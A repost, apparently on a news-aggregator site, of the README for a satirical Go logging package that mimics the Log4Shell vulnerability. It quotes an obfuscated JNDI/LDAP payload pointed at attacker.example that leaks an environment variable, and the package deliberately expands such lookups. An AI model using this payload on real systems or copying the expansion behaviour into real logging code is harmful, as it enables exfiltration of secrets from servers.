• Latest
  • Trending

Jndi: An irresponsibly bad logging library

December 11, 2021

Shania Twain, 57, Seen In Very Rare Photos With Husband As She Rolls Her Own Bag At Airport

January 4, 2023

Kelly Osbourne’s Son’s Name Is Revealed By Mom Sharon As She Returns To TV After Hospitalization

January 4, 2023

Nastia Liukin’s ‘Mental Toughness’ From The Olympics ‘Snapped’ Back During ‘Special Forces’ (Exclusive)

January 4, 2023

Chris Evans Calls Jeremy Renner ‘Tough As Nails’ After Snow Plow Accident: ‘Love You Buddy’

January 4, 2023

Keke Palmer Cradles Her Baby Bump In Strapless Swimsuit On Babymoon With Darius Jackson: Photos

January 4, 2023

Jinny Ng Reveals Why She Scolds Her Husband

January 4, 2023

Lee Seung Gi Will Not Back Down from Contractual Dispute

January 4, 2023

It’s Hard Out There for Artists: Talking About Musicians & Mental Health

January 4, 2023

Prince William Is Reportedly Too ‘Nervous’ to Talk to Prince Harry: ‘They’re Done’

January 4, 2023

Jenna Ortega Debuted a Wolf Cut Bob in a Dress Wednesday Addams Would Love—See Pics

January 4, 2023

Rihanna Just Shared the First Look at Her Baby Son’s Face and He Couldn’t Be Cuter—Watch the Video

January 4, 2023

Simone Biles and Jonathan Owens’s Relationship: A Complete Timeline

January 4, 2023
Retail
Tuesday, May 30, 2023
Submit/Manage Your own Posts
  • Login
  • Register
  • Tech
  • Science
  • Entertainment
  • Sport
  • Health
  • Lifestyle
  • World
  • Celebrities
  • Sports
No Result
View All Result
Live24x7.news
No Result
View All Result

Jndi: An irresponsibly bad logging library

by News Editor
December 11, 2021
in Science, Tech
0

YOU MAY ALSO LIKE

How power-guzzling graphics cards affect the rest of your PC

Nextbase Dash 320XR dash cam review: More style than substance

Is CVE-2021-44228 making you feel left out as a Go programmer?

Fear not. We can fix that.

I wouldn’t use this package, but if you want to…

package main

import "github.com/bradfitz/jndi"

var logger = jndi.NewLogger()

func main() {
	//...
}

func handleSomeTraffic(r *request) {
        logger.Printf("got request from %s", r.URL.Path)
}

Congrats, the user actually wrote ${jndi:ldap://attacker.example/${env:${lower:u}ser}} and
the logger expanded your environment variable and sent it over the network
as a side-effect of logging.

Inspiration

I saw https://twitter.com/_StaticFlow_/status/1469358229767475205 and thought it’d
be fun to write an expander while I was bored, stuck in transit.

Bugs

This package is incomplete. log4j actually does a bunch more:

  • https://logging.apache.org/log4j/2.x/manual/configuration.html#PropertySubstitution
  • https://logging.apache.org/log4j/2.x/manual/lookups.html

Patches welcome to help flesh this package out. We’ve got some
catching up to do.

Apologies

In case you’re seeing this on GitHub and not via Twitter, I acknowledged
that this is questionable taste: https://twitter.com/bradfitz/status/1469523985998118925

In general I believe in the whole #hugops thing. I had a CVE filed against
my own code just the day before: https://twitter.com/bradfitz/status/1469015417679081472

It happens. I joke to cope.

Read More
Photo Credit:

Tags: irresponsiblylogging
ShareTweetShare
  • Tech
  • Science
  • Entertainment
  • Sport
  • Health
  • Lifestyle
  • World
  • Celebrities
  • Sports
Email:live24x7.news.official@gmail.com Call/Whatsapp us: +91 9961702230

© 2022 Live24x7.news

No Result
View All Result
  • Tech
  • Science
  • Entertainment
  • Sport
  • Health
  • Lifestyle
  • World
  • Celebrities
  • Sports

© 2022 Live24x7.news

Welcome Back!

Login to your account below

Forgotten Password? Sign Up

Create New Account!

Fill the forms below to register

All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In